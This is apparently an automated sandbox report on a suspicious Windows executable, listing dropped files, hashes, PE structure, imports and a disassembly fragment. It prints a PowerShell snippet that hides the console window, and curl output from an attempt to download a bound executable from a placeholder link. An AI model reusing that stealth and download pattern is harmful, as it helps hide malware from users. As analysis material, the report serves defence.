                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23f2UdQVU1JJ0zxs7+AEszICN23f2UdQVQ:p37Lvkmb6KmO4JJ0WZE7O+
                                  MD5:3708792369C23F74EB58D4A3537BC445
                                  SHA1:C0067B5E5F40878D0CD1C555DC6DFE126BF9A249
                                  SHA-256:9E81FE6FC1B7A15E00AC59B21C35E104F0E6842EC72D88D81CEB836422A7C011
                                  SHA-512:FF724294646E404E349A7669D8A74B61EF9387FED2F2C057EB1CB968C92C1A2AC03086C66F904082230555B0C85A30181CA12BCD584D8E0419F1E655C8D93BF2
                                  Malicious:false
                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.0.cs"
                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):3584
                                  Entropy (8bit):2.704198677869779
                                  Encrypted:false
                                  SSDEEP:48:6CrjQh76iWVCcJG9U9NOGt1ulOeGa3HeFq:zViWVEU9W1GK+
                                  MD5:83E655DA42DBFF58612113D1210CB8F7
                                  SHA1:12E27ACCA9D599C6E158AE1D3E460B901A1EA8CF
                                  SHA-256:DD7A15DB5C10D2F5628C6F22FDA524DBA137D45F9BB462BA8932B65750AB3AE7
                                  SHA-512:CED7921078EED38895BBD1296DE4D61FEBB4E09C9A5A99574D2E58DA2922B9D3150FA44FEFF326D9DFED9D0B193C3A486ABCA499F522F433578C53816D7246F6
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....|.f...........!................>$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ $......H........ ..d............................................................0..........(......~....(....,...(....&*..(....*BSJB............v4.0.30319......l...D...#~......@...#Strings............#US.........#GUID.......\...#Blob...........G.........%3................................................................6./.....r.....r.........#./.................................... =............ N.....P ......Y.....x ......^.........d.....i...^.....^...!.^.!.).*.&.)./.)...^.......3...
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (451), with CRLF, CR line terminators
                                  Category:modified
                                  Size (bytes):872
                                  Entropy (8bit):5.3426740074213805
                                  Encrypted:false
                                  SSDEEP:24:KSId3ka6Km5E7AKax5DqBVKVrdFAMBJTH:dkka6P5E7AK2DcVKdBJj
                                  MD5:7BA7BE1AAD68B5A670DC120F7B213128
                                  SHA1:8703CBC19783B8BCEAEEB33D1CDA8C4C1CACE6D5
                                  SHA-256:403391AEE14EC59760B3BCEDFE6BEFC54CF8E58596D9113C933971DA2EAA30B1
                                  SHA-512:6B5DEC63F14B88A80A5888C2177A762B4581CF699CA927B4A03F300A0B78ED41894DC5C832880EBC989F651C1EB71E048386BE27A6F3C82EB111ED2B721C41C8
                                  Malicious:false
                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wy53vvk1\wy53vvk1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):379
                                  Entropy (8bit):4.865367304433126
                                  Encrypted:false
                                  SSDEEP:6:rIQm/mAMLL+iNFs2SRaiP2hM/siNFs2SRkoSoODxLnRTZDsTqstSRz/:rDmug7I9OxLRTZD2qwi
                                  MD5:18047E197C6820559730D01035B2955A
                                  SHA1:277179BE54BBA04C0863AEBD496F53B129D47464
                                  SHA-256:348342FD00E113A58641B2C35DD6A8F2C1FB2F1B16D8DFF9F77B05F29E229EF3
                                  SHA-512:1942ACD6353310623561EFB33D644BA45AB62C1DDFABB1A1B3B1DD93F7D03DF0884E2F2FC927676DC3CD3B563D159E3043D2EFF81708C556431BE9BAF4CCB877
                                  Malicious:false
                                  Preview:. Add-Type -Name Window -Namespace Console -MemberDefinition '. [DllImport("Kernel32.dll")]. public static extern IntPtr GetConsoleWindow();.. [DllImport("user32.dll")]. public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);. '.. $consolePtr = [Console.Window]::GetConsoleWindow(). #0 hide. [Console.Window]::ShowWindow($consolePtr, 0).
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):0.34726597513537405
                                  Encrypted:false
                                  SSDEEP:3:Nlll:Nll
                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\curl.exe
                                  File Type:ASCII text, with CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):379
                                  Entropy (8bit):3.5592186036476376
                                  Encrypted:false
                                  SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcvRFNaA3Yn2ICGD:Vz6ykymUexb1U9cL9cvRLId
                                  MD5:AA1712BC7819E715D52A031419FA1299
                                  SHA1:775F7237A9814ED3089EBE5F7203AE24D6B48711
                                  SHA-256:5D7E69B203A67B38CE9D6E2F9692B5372DF86A58B4801A83B3A6D01A1AEEFCF6
                                  SHA-512:C8E3A040AE2BC4238C6F05EAF011E280818287ED3D765EDABCDB6A63D7E6D850AABF4B0ED4A1D2A2153999F9D97DAB3D48C4DC43C2BCA46C7A82EEF5263195F6
                                  Malicious:false
                                  Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0curl: (6) Could not resolve host: YOUR-BINDED-EXE-LINK-HERE..
                                  File type:PE32+ executable (console) x86-64, for MS Windows
                                  Entropy (8bit):7.0903899507489285
                                  TrID:
                                  • Win64 Executable Console (202006/5) 92.65%
                                  • Win64 Executable (generic) (12005/4) 5.51%
                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                  • DOS Executable Generic (2002/1) 0.92%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:golang-modules.exe
                                  File size:39'414'942 bytes
                                  MD5:5267dcdb0d72961dac15cbbaeae52a23
                                  SHA1:49542b18c8dfc59e98da79f35f7fd77d80ecf944
                                  SHA256:206e0dc156e13faad576578f157f1e0a5f59f4069ee0ada9f7fc38bc0e6a6897
                                  SHA512:186bdd45425450084141235b54c9eb0c3709bad915f60640c69e1dcae861f768db80befbb30c86e3d70cf4035f932f6e842f9d41fa5605d6f37a966b7863d0e7
                                  SSDEEP:393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgI96l+ZArYsFRl3P2:R3on1HvSzxAMNIFZArYs/Pv027OZH
                                  TLSH:9A87AE03B2A501E5E4B7D1388AA75203D772B8674731CACF325D02161FBBAE09A7F765
                                  File Content Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$.......? x.{A..{A..{A...3..cA...3...A...3..TA..)4..hA..)4..qA..)4...A......wA..{A..eA...4..zA...4..yE...4..+B...3..lA..{A...@...4...A.
                                  Icon Hash:0f3bfcfc7979130e
                                  Entrypoint:0x141005168
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x140000000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x62C8BFD6 [Fri Jul 8 23:37:58 2022 UTC]
                                  TLS Callbacks:0x41004e74, 0x1
                                  CLR (.Net) Version:
                                  OS Version Major:6
                                  OS Version Minor:0
                                  File Version Major:6
                                  File Version Minor:0
                                  Subsystem Version Major:6
                                  Subsystem Version Minor:0
                                  Import Hash:f0486e7e054aa57188c99b0f71783b75
                                  Instruction
                                  dec eax
                                  sub esp, 28h
                                  call 00007FB648C16620h
                                  dec eax
                                  add esp, 28h
                                  jmp 00007FB648C16077h
                                  int3
                                  int3
                                  dec eax
                                  mov eax, esp
                                  dec eax
                                  mov dword ptr [eax+08h], ebx
                                  dec eax
                                  mov dword ptr [eax+10h], ebp
                                  dec eax
                                  mov dword ptr [eax+18h], esi
                                  dec eax
                                  mov dword ptr [eax+20h], edi
                                  inc ecx
                                  push esi
                                  dec eax
                                  sub esp, 20h
                                  dec ecx
                                  mov ebx, dword ptr [ecx+38h]
                                  dec eax
                                  mov esi, edx
                                  dec ebp
                                  mov esi, eax
                                  dec eax
                                  mov ebp, ecx
                                  dec ecx
                                  mov edx, ecx
                                  dec eax
                                  mov ecx, esi
                                  dec ecx
                                  mov edi, ecx
                                  dec esp
                                  lea eax, dword ptr [ebx+04h]
                                  call 00007FB648C15735h
                                  mov eax, dword ptr [ebp+04h]
                                  and al, 66h
                                  neg al
                                  mov eax, 00000001h
                                  inc ebp
                                  sbb eax, eax
                                  inc ecx
                                  neg eax
                                  inc esp
                                  add eax, eax
                                  inc esp
                                  test dword ptr [ebx+04h], eax
                                  je 00007FB648C16213h
                                  dec esp
                                  mov ecx, edi
                                  dec ebp
                                  mov eax, esi
                                  dec eax
                                  mov edx, esi
                                  dec eax
                                  mov ecx, ebp
                                  call 00007FB648C18EE9h
                                  dec eax
                                  mov ebx, dword ptr [esp+30h]
                                  dec eax
                                  mov ebp, dword ptr [esp+38h]
                                  dec eax
                                  mov esi, dword ptr [esp+40h]
                                  dec eax
                                  mov edi, dword ptr [esp+48h]
                                  dec eax
                                  add esp, 20h
                                  inc ecx
                                  pop esi
                                  ret
                                  int3
                                  dec eax
                                  lea ecx, dword ptr [00F9FFBDh]
                                  dec eax
                                  jmp dword ptr [0004CF86h]
                                  int3
                                  int3
                                  dec eax
                                  mov eax, esp
                                  dec eax
                                  mov dword ptr [eax+18h], ebx
                                  dec eax
                                  mov dword ptr [eax+20h], esi
                                  dec eax
                                  mov dword ptr [eax+10h], edx
                                  dec eax
                                  mov dword ptr [eax+08h], ecx
                                  push edi
                                  inc ecx
                                  push esi
                                  inc ecx
                                  push edi
                                  dec eax
                                  sub esp, 30h
                                  dec ebp
                                  mov edi, ecx
                                  dec ebp
                                  mov esi, eax
                                  dec eax
                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x1afe4500x1d4cec.rdata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1cd313c0xf0.rdata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x20700000x22a78.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1fa70000xc73ec.pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x20930000x19f70.reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1a041b80x70.rdata
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x1a043800x28.rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1a042300x138.rdata
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x10520000xbf0.rdata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  .text0x10000x10505000x1050600863b3e65b5e99a806d37652dc619df4cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .rdata0x10520000xc839940xc83a0086bd32275de927539fb39af501307807unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .data0x1cd60000x2d08ec0x25c00eb8c812a71371d42e1b1371655be37ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .pdata0x1fa70000xc73ec0xc740051178e1d278705576eaa498b00b1fd14False0.47985365040777916data6.733790782093396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  _RDATA0x206f0000xf40x200b7311f08d480434d5674e272bbedb947False0.3125data2.448623140772552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc0x20700000x22a780x22c0059de851bd601f85b0ea013e8d5e15842False0.43743676933453235data6.164731147407092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc0x20930000x19f700x1a0004ca6b516bbd00cffa85c956eb4fda9a2False0.1744103064903846data5.485192961652581IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x20702200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/mEnglishUnited States0.6214539007092199
                                  RT_ICON0x20706880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/mEnglishUnited States0.37406191369606
                                  RT_ICON0x20717300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/mEnglishUnited States0.28226141078838174
                                  RT_ICON0x2073cd80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/mEnglishUnited States0.23358526216343883
                                  RT_ICON0x2077f000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/mEnglishUnited States0.1762244173666154
                                  RT_ICON0x20887280x9ccaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004235387911704
                                  RT_GROUP_ICON0x20923f80x5adataEnglishUnited States0.7555555555555555
                                  RT_VERSION0x20924580x2e8dataEnglishUnited States0.46236559139784944
                                  RT_MANIFEST0x20927400x336XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (762), with CRLF line terminatorsEnglishUnited States0.5048661800486618
                                  DLLImport
                                  dbghelp.dllSymFromAddr, SymInitialize, SymGetLineFromAddr64, SymCleanup, SymSetOptions, UnDecorateSymbolName
                                  WS2_32.dllfreeaddrinfo, getaddrinfo, WSACleanup, gethostbyname, ntohl, htonl, GetAddrInfoW, getnameinfo, gethostname, __WSAFDIsSet, accept, sendto, recvfrom, send, recv, FreeAddrInfoW, closesocket, GetNameInfoW, select, WSASocketW, WSASend, WSAGetOverlappedResult, WSADuplicateSocketW, shutdown, listen, htons, WSASendTo, WSARecvFrom, WSARecv, setsockopt, getsockname, getpeername, ioctlsocket, connect, bind, WSAGetLastError, GetHostNameW, WSAIoctl, WSASetLastError, WSAStartup, socket, getsockopt, ntohs
                                  IPHLPAPI.DLLGetAdaptersAddresses, ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameW
                                  PSAPI.DLLGetModuleFileNameExW, GetProcessMemoryInfo, EnumProcessModules
                                  USERENV.dllGetUserProfileDirectoryW
                                  ADVAPI32.dllCryptAcquireContextW, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExW, RegQueryInfoKeyW, OpenProcessToken, GetUserNameW, RegCloseKey, RegOpenKeyExW, ReportEventW, RegisterEventSourceW, DeregisterEventSource, CryptEnumProvidersW, CryptSignHashW, CryptDestroyHash, CryptCreateHash, CryptDecrypt, CryptExportKey, CryptGetUserKey, CryptGetProvParam, CryptSetHashParam, CryptDestroyKey, CryptReleaseContext, RegQueryValueExW, SetSecurityInfo, GetSecurityInfo, SetEntriesInAclA, FreeSid, AllocateAndInitializeSid, SystemFunction036, RegGetValueW, RegEnumKeyExA
                                  USER32.dllGetProcessWindowStation, MapVirtualKeyW, DispatchMessageA, TranslateMessage, GetUserObjectInformationW, GetSystemMetrics, GetMessageA, MessageBoxW
                                  CRYPT32.dllCertOpenStore, CertCloseStore, CertEnumCertificatesInStore, CertFindCertificateInStore, CertDuplicateCertificateContext, CertFreeCertificateContext, CertGetCertificateContextProperty
                                  bcrypt.dllBCryptGenRandom
                                  KERNEL32.dllRtlLookupFunctionEntry, RtlCaptureContext, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, CreateEventW, WaitForSingleObjectEx, GetCPInfo, GetStringTypeW, InterlockedPushEntrySList, RtlUnwindEx, RtlPcToFileHeader, RaiseException, ExitProcess, GetModuleHandleExW, SetStdHandle, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileAttributesExW, SetFileAttributesW, GetConsoleOutputCP, GetDriveTypeW, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapReAlloc, SetEndOfFile, OutputDebugStringW, HeapSize, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetProcessHeap, DeleteCriticalSection, VerSetConditionMask, VerifyVersionInfoW, GetEnvironmentVariableA, WideCharToMultiByte, GetLastError, GetLocalTime, SetConsoleCtrlHandler, CloseHandle, WaitForSingleObject, CreateRemoteThread, OpenProcess, OpenFileMappingW, MapViewOfFile, UnmapViewOfFile, GetFileType, RtlCaptureStackBackTrace, GetStdHandle, GetCurrentProcess, GetCurrentProcessId, VirtualQuery, MultiByteToWideChar, WriteConsoleW, LocalFree, FormatMessageA, InitOnceExecuteOnce, CreateEventA, GetModuleHandleA, GetProcAddress, LoadLibraryA, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentVariableW, SetEnvironmentVariableW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetTempPathW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, Sleep, GetProcessTimes, SetPriorityClass, GetPriorityClass, GlobalMemoryStatusEx, GetSystemInfo, GetSystemTimeAsFileTime, GetVersionExW, GetModuleFileNameW, GetProcessIoCounters, VerifyVersionInfoA, FileTimeToSystemTime, GetConsoleTitleW, SetConsoleTitleW, CreateToolhelp32Snapshot, Process32First, Process32Next, SetHandleInformation, CreateIoCompletionPort, SetFileCompletionNotificationModes, CreateFileA, CreateFileW, DuplicateHandle, PostQueuedCompletionStatus, SetEvent, ResetEvent, QueueUserWorkItem, RegisterWaitForSingleObject, UnregisterWait, GetConsoleMode, SetConsoleMode, GetNumberOfConsoleInputEvents, ReadConsoleInputW, ReadConsoleW, FillConsoleOutputCharacterW, FillConsoleOutputAttribute, GetConsoleCursorInfo, SetConsoleCursorInfo, GetConsoleScreenBufferInfo, SetConsoleCursorPosition, SetConsoleTextAttribute, WriteConsoleInputW, CancelIoEx, CancelIo, SwitchToThread, GetStartupInfoW, GetFileAttributesW, TerminateProcess, GetExitCodeProcess, CreateProcessW, UnregisterWaitEx, CreateJobObjectW, AssignProcessToJobObject, SetInformationJobObject, LCMapStringW, TryEnterCriticalSection, RtlUnwind, InitializeConditionVariable, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, ReleaseSemaphore, CreateSemaphoreW, ResumeThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetNativeSystemInfo, CreateSemaphoreA, FlushFileBuffers, ReadFile, WriteFile, ConnectNamedPipe, SetNamedPipeHandleState, PeekNamedPipe, CreateNamedPipeW, WaitNamedPipeW, CancelSynchronousIo, GetCurrentThread, CreateNamedPipeA, GetNamedPipeHandleStateA, GetLongPathNameW, GetShortPathNameW, ReadDirectoryChangesW, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, GetDiskFreeSpaceW, GetFileInformationByHandle, GetFileSizeEx, GetFinalPathNameByHandleW, GetFullPathNameW, RemoveDirectoryW, SetFilePointerEx, SetFileTime, DeviceIoControl, FlushViewOfFile, CreateFileMappingA, ReOpenFile, CopyFileW, MoveFileExW, CreateHardLinkW, GetFileInformationByHandleEx, CreateSymbolicLinkW, DebugBreak, FreeLibrary, LoadLibraryExW, SetErrorMode, GetQueuedCompletionStatus, ReadConsoleA, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, LoadLibraryW, GetModuleHandleW, GetSystemTime, SystemTimeToFileTime, FormatMessageW, SwitchToFiber, DeleteFiber, CreateFiber, ConvertFiberToThread, ConvertThreadToFiber, RtlVirtualUnwind, AddVectoredExceptionHandler, RemoveVectoredExceptionHandler, RtlAddFunctionTable, RtlDeleteFunctionTable, VirtualProtect, IsDebuggerPresent, OutputDebugStringA, GetLocaleInfoEx, GetNumberFormatEx, GetCurrencyFormatEx, ResolveLocaleName, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, GetTimeFormatEx, GetDateFormatEx, GetVersionExA, ExpandEnvironmentStringsA, GetWindowsDirectoryA, GetTickCount, GetACP, GetDynamicTimeZoneInformation, GetGeoInfoW, GetUserGeoID, CreateFileMappingW, LocaleNameToLCID, LCIDToLocaleName, ReleaseSRWLockExclusive, ReleaseSRWLockShared, AcquireSRWLockExclusive, AcquireSRWLockShared, TryAcquireSRWLockExclusive, TryAcquireSRWLockShared, SleepConditionVariableSRW, DeleteFileA, GetFileSize, GetTempPathA, GetTempFileNameA, GetThreadTimes, VirtualAlloc, VirtualFree, SetThreadPriority, GetThreadPriority, QueryThreadCycleTime, OpenThread, SuspendThread, 